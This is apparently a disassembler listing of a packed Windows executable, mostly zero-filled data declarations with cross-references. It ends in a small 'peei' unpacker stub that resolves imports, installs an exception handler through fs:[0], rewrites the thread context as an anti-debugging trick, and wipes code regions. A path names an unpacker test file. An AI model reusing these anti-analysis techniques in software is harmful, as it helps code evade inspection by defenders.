align 10h
dd 3 dup(0)
byte_45847C db 0 ; DATA XREF: sub_41D318+E�o
; sub_41D318+14A�w
align 10h
dd 3 dup(0)
dword_45848C dd 4 dup(0) dword_45849C dd 4 dup(0) dword_4584AC dd 0 ; sub_41C8B1+B3�w ...
dword_4584B0 dd 0 ; sub_41C600+35�r ...
align 10h
dword_4584C0 dd 0 ; sub_41C6C4+1�o ...
align 10h
dword_4584D0 dd 0 ; sub_41C704+35�r
dd 86h dup(0)
db 0
byte_4586ED db 3 dup(0) ; DATA XREF: sub_41C600+13�o
; sub_41C65E+47�o ...
dword_4586F0 dd 0 ; sub_41E661+58�r ...
dword_4586F4 dd 0 ; sub_41E661+3B�r ...
dword_4586F8 dd 0 ; sub_41E7BE+8D�o
dword_4586FC dd 0 ; sub_41E7BE+121�w ...
dword_458700 dd 0 ; sub_41E661+F3�r ...
dd 4 dup(0)
dword_458714 dd 0Dh dup(0) ; sub_41E7BE:loc_41E8FD�o
dword_458748 dd 0 ; sub_41EC9D+4D�r ...
align 10h
dword_458750 dd 0 ; sub_41EC9D+CE�r ...
dd 9C3h dup(0)
dword_45AE60 dd 40h dup(0) ; sub_41EFEF+4C�o
dword_45AF60 dd 20h dup(0) dword_45AFE0 dd 0 ; sub_41F0F5:loc_41F18A�r
align 8
dword_45AFE8 dd 0 ; sub_421340+5E�w ...
dd 4000h dup(0)
dword_46AFEC dd 0 ; sub_4221E4+63�r ...
dword_46AFF0 dd 0 ; sub_422147+50�w
dword_46AFF4 dd 0 ; sub_422147+8�w ...
dword_46AFF8 dd 0 ; sub_422147+1C�w ...
dword_46AFFC dd 0 dword_46B000 dd 0 dword_46B004 dd 0 dword_46B008 dd 0 ; sub_422147+5B�w
dword_46B00C dd 0 ; sub_422147+61�w
dword_46B010 dd 0 ; sub_407281+94�o ...
dd 9C3h dup(0)
dword_46D720 dd 0 ; sub_4234A7+79�w ...
dword_46D724 dd 0 ; sub_402675+47�r ...
dword_46D728 dd 0 ; sub_41E7BE+16B�w ...
dword_46D72C dd 0 ; sub_402459+15D�w ...
dword_46D730 dd 0 ; .text:0040A23C�w ...
dd 0A45h dup(0)
db 3 dup(0)
byte_47004B db 0 ; DATA XREF: .text:0043C5C9�o
; .text:0043E4D1�o
db 3 dup(0)
byte_47004F db 0 ; DATA XREF: .text:0044ED3C�o
dd 7FFFh dup(0)
db 0
byte_49004D db 3 dup(0) ; DATA XREF: .text:0044ED98�o
; .text:0044EF4C�o
dword_490050 dd 3 dup(0) dword_49005C dd 7FFAh dup(0) db 3 dup(0)
byte_4B0047 db 0 ; DATA XREF: .text:0043C5F1�o
; .text:0043E4F9�o
dd 13B8h dup(0)
db 3 dup(0)
byte_4B4F2B db 0 ; DATA XREF: .text:off_4506DC�o
dd 2C45h dup(0)
db 3 dup(0)
db 0
dd 4 dup(0)
dword_4C0054 dd 507Dh dup(0) db 0
byte_4D4249 db 3 dup(0) ; DATA XREF: .text:off_43DA58�o
dd 5C1h dup(0)
db 3 dup(0)
byte_4D5953 db 0 ; DATA XREF: .text:off_44D5E0�o
dd 29BDh dup(0)
db 0
byte_4E0049 db 3 dup(0) ; DATA XREF: .text:0044EDA8�o
; .text:0044EF3C�o
db 3 dup(0)
byte_4E004F db 0 ; DATA XREF: .text:0044ED40�o
dd 103Fh dup(0)
dword_4E414C dd 202h dup(0) db 3 dup(0)
byte_4E4957 db 0 ; DATA XREF: .text:off_447718�o
dd 27Ah dup(0)
db 0
byte_4E5341 db 3 dup(0) ; DATA XREF: .text:off_44D5B4�o
dd 2B43h dup(0)
db 2 dup(0)
word_4F0052 dw 0 ; DATA XREF: .text:0043C5CD�o
; .text:0043E4D5�o
dd 0B3Dh dup(0)
dword_4F2D48 dd 34ADh dup(0) db 3 dup(0)
byte_4FFFFF db 0 ; DATA XREF: sub_41F0F5+33A�o
dd 12h dup(0)
db 0
byte_500049 db 3 dup(0) ; DATA XREF: .text:off_44ED88�o
; .text:off_44EF58�o
dword_50004C dd 2 dup(0) db 0
byte_500055 db 3 dup(0) ; DATA XREF: .text:0043C5D1�o
; .text:0043E4D9�o
dd 4005h dup(0)
dword_51006C dd 3FF5h dup(0) ; .text:0043E4DD�o
db 2 dup(0)
word_520042 dw 0 ; DATA XREF: .text:off_44ED68�o
dd 2 dup(0)
db 3 dup(0)
byte_52004F db 0 ; DATA XREF: .text:0043C5C5�o
; .text:0043E4CD�o
dword_520050 dd 0 ; .text:off_44EF38�o
dword_520054 dd 3FFDh dup(0) db 0
byte_530049 db 3 dup(0) ; DATA XREF: .text:0043C5E1�o
; .text:0043E4E9�o
dd 935h dup(0)
dword_532520 dd 47CCh dup(0) dword_544450 dd 3C0h dup(0) dword_545350 dd 3C3Dh dup(0) db 0
byte_554445 db 3 dup(0) ; DATA XREF: .text:off_43D660�o
dd 1C0h dup(0)
dword_554B48 dd 2D3Fh dup(0) db 0
byte_560045 db 3 dup(0) ; DATA XREF: .text:0043C5E9�o
; .text:0043E4F1�o
dd 1482h dup(0)
db 3 dup(0)
byte_565253 db 0 ; DATA XREF: .text:off_43A5D7�o
dd 2B7Eh dup(0)
db 3 dup(0)
byte_57004F db 0 ; DATA XREF: .text:0044ED6C�o
dd 3FFDh dup(0)
db 2 dup(0)
word_580046 dw 0 ; DATA XREF: .text:off_43BAB4�o
; .text:0043BABC�o ...
dd 53BEh dup(0)
db 2 dup(0)
word_594F42 dw 0 ; DATA XREF: .text:off_44F8B8�o
dd 0AC38h dup(0)
dword_5C0024 dd 7 dup(0) ; .text:0043C0B4�o
db 3 dup(0)
byte_5C0043 db 0 ; DATA XREF: .text:0044ED8C�o
dd 2 dup(0)
db 2 dup(0)
word_5C004E dw 0 ; DATA XREF: .text:0044ED9C�o
db 2 dup(0)
word_5C0052 dw 0 ; DATA XREF: .text:0044ED74�o
; .text:0044EDB0�o
dd 2 dup(0)
dword_5C005C dd 0E79h dup(0) db 0
byte_5C3A41 db 3 dup(0) ; DATA XREF: .text:off_447400�o
dd 0D086h dup(0)
db 3 dup(0)
byte_5F7C5F db 0 ; DATA XREF: .text:off_44F8E8�o
dd 7940h dup(0)
db 0
byte_616161 db 3 dup(0) ; DATA XREF: .text:off_43DAA8�o
dd 1BFh dup(0)
db 0
byte_616861 db 3 dup(0) ; DATA XREF: .text:off_44F89C�o
dd 25F3h dup(0)
db 0
byte_620031 db 3 dup(0) ; DATA XREF: .text:0043C5ED�o
; .text:0043E4F5�o
dd 0ACBh dup(0)
db 0
byte_622B61 db 3 dup(0) ; DATA XREF: .text:off_44DD1C�o
dd 1083h dup(0)
db 3 dup(0)
byte_626D73 db 0 ; DATA XREF: .text:off_43D680�o
dd 3D3Bh dup(0)
db 0
byte_636261 db 3 dup(0) ; DATA XREF: .text:off_43D750�o
dd 42h dup(0)
db 0
byte_63636D db 3 dup(0) ; DATA XREF: .text:off_44F924�o
dd 75h dup(0)
dword_636544 dd 248h dup(0) db 2 dup(0)
word_636E66 dw 0 ; DATA XREF: .text:off_43D3FC�o
dd 3 dup(0)
db 2 dup(0)
word_636E76 dw 0 ; DATA XREF: .text:off_43D970�o
dd 0FEh dup(0)
db 3 dup(0)
byte_637273 db 0 ; DATA XREF: .text:off_446E34�o
dd 7Bh dup(0)
db 3 dup(0)
byte_637463 db 0 ; DATA XREF: .text:off_4462D0�o
dd 105h dup(0)
db 2 dup(0)
word_63787A dw 0 ; DATA XREF: .text:off_43D2C0�o
dd 21E1h dup(0)
dword_640000 dd 1854h dup(0) db 3 dup(0)
byte_646153 db 0 ; DATA XREF: .text:off_44F8DC�o
dd 3 dup(0)
db 2 dup(0)
word_646162 dw 0 ; DATA XREF: .text:off_44F9D0�o
dd 0FCh dup(0)
db 3 dup(0)
byte_646557 db 0 ; DATA XREF: .text:00437F08�o
dd 486h dup(0)
dword_647770 dd 223Fh dup(0) db 2 dup(0)
word_65006E dw 0 ; DATA XREF: .text:off_44ED20�o
dd 1B2Dh dup(0)
dword_656D24 dd 20Ch dup(0) dword_657554 dd 87h dup(0) db 0
byte_657771 db 3 dup(0) ; DATA XREF: .text:off_43D504�o
dd 241Ch dup(0)
dword_6607E4 dd 0 ; sub_4235A4+24�o ...
dword_6607E8 dd 0 ; sub_426C45+93�w ...
dword_6607EC dd 4 dup(0) dword_6607FC dd 0 ; sub_425777+9�o
byte_660800 db 0 ; DATA XREF: sub_426323+E�o
; sub_426323+48�w ...
align 4
dd 31h dup(0)
dword_6608C8 dd 0 ; sub_4264CB:loc_4266B3�w ...
dword_6608CC dd 0 ; sub_4264CB+3A�w ...
dd 0
dword_6608D4 dd 0 ; sub_4266D3+41�r
dd 7Fh dup(0)
dword_660AD4 dd 0 ; sub_4266D3+50�w
dword_660AD8 dd 0 ; sub_4266D3+56�r
dd 906h dup(0)
dword_662EF4 dd 0 ; sub_42381F+19�o
dword_662EF8 dd 293Ch dup(0) byte_66D3E8 db 0 ; DATA XREF: sub_42461A+21�o
; sub_42461A+45�r ...
align 4
dword_66D3EC dd 0A01h dup(0) ; sub_426B6C+27�o
dword_66FBF0 dd 0 ; sub_423919+11B�o ...
dd 18h dup(0)
byte_66FC54 db 0 ; DATA XREF: sub_423919+1D5�w
; sub_423919+30E�w ...
align 4
dd 18h dup(0)
dword_66FCB8 dd 0 ; sub_423919+270�o ...
dd 0E5h dup(0)
db 0
byte_670051 db 3 dup(0) ; DATA XREF: .text:0043C5E5�o
; .text:0043E4ED�o
dd 0D8Dh dup(0)
dword_673688 dd 0 ; sub_423919+131�r ...
dword_67368C dd 0 ; sub_42461A+5�r ...
dword_673690 dd 0 dd 42h dup(0)
dword_67379C dd 0 ; sub_424762+19B�r ...
dword_6737A0 dd 0 ; sub_424762+1A8�r ...
dword_6737A4 dd 0 ; sub_424762+1B0�r ...
dword_6737A8 dd 0 dword_6737AC dd 0 ; sub_424762+1C8�r ...
dword_6737B0 dd 0 ; sub_424762+1B8�r
dword_6737B4 dd 0 ; sub_424762+1C0�r ...
dword_6737B8 dd 0 ; sub_424A59+28�r
dword_6737BC dd 0 ; sub_42495D+21�w ...
dword_6737C0 dd 0 ; sub_424762+E2�w ...
dword_6737C4 dd 0 ; sub_424762+AD�w ...
dword_6737C8 dd 0 dword_6737CC dd 0 ; sub_42461A+D�r
dword_6737D0 dd 2 dup(0) db 0
byte_6737D9 db 0 ; DATA XREF: sub_426FB8+20E�o
word_6737DA dw 0 ; DATA XREF: sub_426FB8+228�o
dword_6737DC dd 9DBh dup(0) byte_675F48 db 0 ; DATA XREF: sub_426FB8+CB�w
; sub_426FB8+1DC�o
align 2
word_675F4A dw 0 ; DATA XREF: sub_426FB8+D2�w
; sub_426FB8+1FC�w
word_675F4C dw 0 ; DATA XREF: sub_426FB8+DA�w
align 10h
word_675F50 dw 0 ; DATA XREF: sub_426FB8+F6�w
align 4
byte_675F54 db 0 ; DATA XREF: sub_426FB8+87�r
; sub_426FB8+90�w
align 2
word_675F56 dw 0 ; DATA XREF: sub_426FB8+B2�w
dd 0
byte_675F5C db 0 ; DATA XREF: sub_426FB8+FF�w
byte_675F5D db 0 ; DATA XREF: sub_426FB8+106�w
; sub_426FB8+209�o
word_675F5E dw 0 ; DATA XREF: sub_426FB8+10D�w
dword_675F60 dd 0 ; sub_426FB8+1F6�o
dword_675F64 dd 0 word_675F68 dw 0 ; DATA XREF: sub_426FB8+BB�w
word_675F6A dw 0 ; DATA XREF: sub_426FB8+C5�w
word_675F6C dw 0 ; DATA XREF: sub_426FB8+138�w
; sub_426FB8+239�o
word_675F6E dw 0 ; DATA XREF: sub_426FB8+145�w
dword_675F70 dd 0 ; sub_426FB8+1D2�w
dword_675F74 dd 0 dword_675F78 dd 0 dword_675F7C dd 0 ; sub_426FB8+16B�w
byte_675F80 db 0 ; DATA XREF: sub_426FB8+1AC�w
align 10h
word_675F90 dw 0 ; DATA XREF: sub_426FB8+193�w
align 4
word_675F94 dw 0 ; DATA XREF: sub_426FB8+188�w
word_675F96 dw 0 ; DATA XREF: sub_426FB8+19C�w
; sub_426FB8+251�w
dd 2 dup(0)
db 2 dup(0)
byte_675FA2 db 0 ; DATA XREF: sub_426FB8+165�w
align 4
dd 0Fh dup(0)
dword_675FE0 dd 0Eh dup(0) dword_676018 dd 55h dup(0) dword_67616C dd 0ABh dup(0) dword_676418 dd 21h dup(0) ; sub_40A9FE:loc_40C5C2�o ...
byte_67649C db 0 ; DATA XREF: sub_428660+1D0�o
; sub_428660+1DC�w ...
byte_67649D db 0 ; DATA XREF: sub_428660+1EA�w
word_67649E dw 0 ; DATA XREF: sub_428660+211�w
word_6764A0 dw 0 ; DATA XREF: sub_428660+202�w
; sub_428660:loc_4289BC�w
word_6764A2 dw 0 ; DATA XREF: sub_428660+217�w
byte_6764A4 db 0 ; DATA XREF: sub_428660+21E�w
byte_6764A5 db 0 ; DATA XREF: sub_428660+1E3�w
word_6764A6 dw 0 ; DATA XREF: sub_428660+371�w
; sub_428660+3A6�w
dword_6764A8 dd 0 ; sub_428660+326�r
dword_6764AC dd 0 word_6764B0 dw 0 ; DATA XREF: sub_428660+320�w
; sub_428660+380�o
word_6764B2 dw 0 ; DATA XREF: sub_428660+2B4�w
; sub_428660+2F7�r ...
dword_6764B4 dd 0 ; sub_428660+363�w
dword_6764B8 dd 0 ; sub_428660+337�w ...
byte_6764BC db 0 ; DATA XREF: sub_428660+292�r
; sub_428660+2A4�w
byte_6764BD db 0 ; DATA XREF: sub_428660+24E�w
; sub_428660+330�w ...
word_6764BE dw 0 ; DATA XREF: sub_428660+26A�w
word_6764C0 dw 0 ; DATA XREF: sub_428660+378�w
; sub_428660+3B4�w
word_6764C2 dw 0 ; DATA XREF: sub_428660+2AD�w
word_6764C4 dw 0 ; DATA XREF: sub_428660+2E4�w
; sub_428660+3BC�o
word_6764C6 dw 0 ; DATA XREF: sub_428660+2FE�w
; sub_428660+393�w
dword_6764C8 dd 0 dd 2 dup(0)
dword_6764D4 dd 0 ; sub_428660+3A1�o
dword_6764D8 dd 0 byte_6764DC db 0 ; DATA XREF: sub_428660+2BF�w
byte_6764DD db 0 ; DATA XREF: sub_428660+2CE�w
word_6764DE dw 0 ; DATA XREF: sub_428660+2DE�w
dword_6764E0 dd 6 dup(0) dword_6764F8 dd 0 ; sub_428660+3C6�r
align 10h
dword_676500 dd 100h dup(0) ; sub_428660+197�o ...
dword_676900 dd 0 ; sub_42A7D5+A4�w
align 8
word_676908 dw 0 ; DATA XREF: sub_42A7D5+55�r
; sub_42A7D5+9A�o
word_67690A dw 0 ; DATA XREF: sub_42A7D5+48�r
db 2 dup(0)
word_67690E dw 0 ; DATA XREF: sub_42A7D5+3B�r
word_676910 dw 0 ; DATA XREF: sub_42A7D5+2E�r
word_676912 dw 0 ; DATA XREF: sub_42A7D5+21�r
dd 2 dup(0)
dword_67691C dd 0 dword_676920 dd 0 ; sub_432104:loc_43212D�w ...
dword_676924 dd 0 ; sub_432C2F:loc_432C41�r ...
dd 0
dword_67692C dd 0 dword_676930 dd 0 ; sub_42B39A+104�r ...
dword_676934 dd 0 dword_676938 dd 0 ; sub_42D6AC+2D�w ...
align 10h
dword_676940 dd 146450h, 0FFFFFFFFh, 4 dup(0)dword_676958 dd 1463D8h, 0FFFFFFFFh, 4 dup(0)dword_676970 dd 146428h, 0FFFFFFFFh, 4 dup(0)dword_676988 dd 146400h, 0FFFFFFFFh, 4 dup(0)dword_6769A0 dd 2 dup(0) ; .text:00434F37�o
dword_6769A8 dd 0 ; sub_42AA81:loc_42AB4F�r ...
dd 3 dup(0)
dword_6769B8 dd 0 ; sub_42AA81+C0�r ...
dd 4 dup(0)
dword_6769CC dd 0 byte_6769D0 db 28h ; DATA XREF: .text:0042C5C6�w
byte_6769D1 db 0Ah ; DATA XREF: sub_42B0E9:loc_42B15F�r
align 4
dword_6769D4 dd 501h dword_6769D8 dd 5 dword_6769DC dd 1 dword_6769E0 dd 1 dword_6769E4 dd 0B427C0h dd 0
dword_6769EC dd 0B427E8h ; sub_4312E3+27�r ...
dword_6769F0 dd 0 dword_6769F4 dd 0 ; sub_434C59+4�r ...
dd 0
off_6769FC dd offset aCM_unpackerPac ; DATA XREF: sub_432CE8+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_676A04 db 0 ; DATA XREF: sub_42C1C0+5�r
; sub_430B56+32�w
align 4
dword_676A08 dd 0 dword_676A0C dd 0 ; sub_430B56+97�w
dword_676A10 dd 1 ; sub_430D9F+4C�w ...
dword_676A14 dd 0 ; sub_4320A0+38�r ...
dword_676A18 dd 0 align 10h
dword_676A20 dd 1 ; sub_432875+4�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_432CE8:loc_432CFF�o
; .text:off_6769FC�o
align 10h
dd 3Ah dup(0)
dword_676B28 dd 1 ; sub_432F35+23�w ...
dword_676B2C dd 0 dword_676B30 dd 1 ; sub_4334DD:loc_433547�w
dword_676B34 dd 0 dword_676B38 dd 0 ; sub_4339B6+7A�w ...
align 10h
dword_676B40 dd 0 ; sub_4339B6+5D�r
dword_676B44 dd 10h dup(0) word_676B84 dw 0 ; DATA XREF: sub_433C5E+A8�r
word_676B86 dw 0 ; DATA XREF: sub_4339B6+6B�r
; sub_433C5E+DB�r ...
word_676B88 dw 0 ; DATA XREF: sub_433C5E+CA�r
word_676B8A dw 0 ; DATA XREF: sub_433C5E+D3�r
; sub_433C5E:loc_433D50�r
word_676B8C dw 0 ; DATA XREF: sub_433C5E+C0�r
word_676B8E dw 0 ; DATA XREF: sub_433C5E+B8�r
word_676B90 dw 0 ; DATA XREF: sub_433C5E+B0�r
word_676B92 dw 0 ; DATA XREF: sub_433C5E+9E�r
dword_676B94 dd 0 dword_676B98 dd 10h dup(0) word_676BD8 dw 0 ; DATA XREF: sub_433C5E+46�r
word_676BDA dw 0 ; DATA XREF: sub_4339B6:loc_433A44�r
; sub_433C5E+78�r ...
word_676BDC dw 0 ; DATA XREF: sub_433C5E+67�r
word_676BDE dw 0 ; DATA XREF: sub_433C5E+70�r
; sub_433C5E:loc_433CE2�r
word_676BE0 dw 0 ; DATA XREF: sub_433C5E+5D�r
word_676BE2 dw 0 ; DATA XREF: sub_433C5E+55�r
word_676BE4 dw 0 ; DATA XREF: sub_433C5E+4D�r
word_676BE6 dw 0 ; DATA XREF: sub_433C5E+3E�r
dword_676BE8 dd 0 dword_676BEC dd 0 ; sub_4339B6:loc_433B17�r ...
dword_676BF0 dd 0 ; sub_433988+10�r ...
dd 19h dup(0)
dword_676C58 dd 0 ; resolved to->USER32.MessageBoxA ; sub_434D70+2E�w ...
dword_676C5C dd 0 ; resolved to->USER32.GetActiveWindow ; sub_434D70:loc_434DBF�r
dword_676C60 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_434D70+60�r
dword_676C64 dd 0 align 10h
dword_676C70 dd 2 dup(0) ; .text:00453D38�o ...
dword_676C78 dd 0 ; sub_435021+81�o
dword_676C7C dd 0 ; sub_435021+4A�o
dword_676C80 dd 0 ; sub_435021+3D�o
dword_676C84 dd 0 ; sub_435021+57�o
dd 0
dword_676C8C dd 0 ; sub_435AE5+48�w ...
dd 2 dup(0)
byte_676C98 db 0 ; DATA XREF: sub_4291C3:loc_42921D�r
; sub_4291C3+63�w
byte_676C99 db 0 ; DATA XREF: sub_4291C3+6F�r
; sub_4291C3+78�w
align 4
dword_676C9C dd 4E4h ; sub_4326C8+79�w ...
dword_676CA0 dd 3 dup(0) ; sub_4326C8+179�o ...
dword_676CAC dd 0 ; sub_4326C8+168�w ...
dd 4 dup(0)
byte_676CC0 db 0 ; DATA XREF: sub_43291B:loc_432A27�w
; sub_43291B:loc_432A44�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
db 0
byte_676D69 db 0, 0AAh, 0 ; DATA XREF: .text:off_446E38�o
dd 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_676DC0 db 0 ; DATA XREF: sub_4326C8+6E�o
; sub_4326C8+BE�o ...
byte_676DC1 db 0 ; DATA XREF: sub_42BF95+5D�r
; sub_4326C8+AB�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_676EC4 dd 0 ; sub_4326C8+137�w ...
dword_676EC8 dd 1 ; sub_432C2F+AD�w
dword_676ECC dd 1 ; sub_432AA0+11�w ...
dword_676ED0 dd 0 ; sub_42B7EB:loc_42B834�r ...
dword_676ED4 dd 0 ; sub_42B7EB+11�r ...
dword_676ED8 dd 0 ; sub_42AA24+1A�r ...
dword_676EDC dd 0 ; sub_42A8C0:loc_42A927�w ...
dword_676EE0 dd 0B41F18h ; sub_42C118+81�r ...
dword_676EE4 dd 22h dup(0) dword_676F6C dd 1Dh dup(0) dword_676FE0 dd 20h ; sub_42F4BE+5�r ...
dword_676FE4 dd 0 ; sub_42CF57+5�r ...
dword_676FE8 dd 0 ; sub_42C925+25A�r ...
dword_676FEC dd 0 ; sub_42C925+311�w ...
dword_676FF0 dd 0 ; sub_42C925+22D�r ...
dword_676FF4 dd 0 ; sub_42C8FA�r ...
dword_676FF8 dd 0 ; sub_42C8FA+8�r ...
dword_676FFC dd 0 ; sub_42B39A+64�r ...
dword_677000 dd 0B40000h ; sub_4298F2+CE�r ...
dword_677004 dd 1 ; sub_4298F2+2E�r ...
dword_677008 dd 142340h ; sub_432BD7+F�r ...
dword_67700C dd 0 ; sub_42C118+41�w ...
dd 4 dup(0)
dword_677020 dd 400h dup(0) ; .text:00450EC8�o
dword_678020 dd 0 ; sub_42C118:loc_42C132�w ...
align 2000h
_text ends
; Section 3. (virtual address 0027C000)
; Virtual size : 00000FFF ( 4095.)
; Section size in file : 00000FFF ( 4095.)
; Offset to raw data for section: 0027C000
; Flags E00FFFF0: Copy Text Data Bss Exception Comment Overlay Lib Loader Debug Type check Overflow Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
peei segment para public 'CODE' use32
assume cs:peei
;org 67C000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 3 dup(0)
dd 27C028h, 27C035h, 5 dup(0)
dd 6E72654Bh, 32336C65h, 6C6C642Eh, 801D7700h, 80ADA07Ch
dd 7Ch, 616F4C00h, 62694C64h, 79726172h, 47000041h, 72507465h
dd 6441636Fh, 73657264h, 73h
; ---------------------------------------------------------------------------
public start
start:
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
lea edi, [ebp-40h]
push 10h
pop ecx
mov eax, 0CCCCCCCCh
rep stosd
; ---------------------------------------------------------------------------
dw 0
dd 228h dup(0)
db 3 dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
db 36h
mov eax, [ebp+10h]
db 3Eh
mov edi, [eax+0C4h]
db 3Eh
push dword ptr [edi]
xor edi, edi
pop dword ptr fs:[edi]
db 3Eh
add dword ptr [eax+0C4h], 8
db 3Eh
mov edi, [eax+0A4h]
rol edi, 7
db 3Eh
mov [eax+0B8h], edi
mov eax, 0
pop edi
leave
retn
; ---------------------------------------------------------------------------
xor al, al
mov edx, ebp
add edx, 4038EBh
lea edi, [edx]
mov ecx, offset loc_404190
sub ecx, 4038EBh
loc_67C96A: ; CODE XREF: peei:0067C96B�j
stosb
loop loc_67C96A
mov edx, ebp
add edx, 404207h
lea edi, [edx]
mov ecx, offset loc_4044E2
sub ecx, 404207h
loc_67C982: ; CODE XREF: peei:0067C983�j
stosb
loop loc_67C982
popa
push eax
xor eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
jmp short near ptr word_67C992
; ---------------------------------------------------------------------------
align 2
word_67C992 dw 0 ; CODE XREF: peei:0067C98F�j
dd 0BCh dup(0)
dd 0DC23400h, 201h, 0C300h, 0DBh dup(0)
db 3 dup(0)
db ?
peei ends
; Section 4. (virtual address 0027D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0027D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 67D000h
align 2000h
_idata2 ends
end start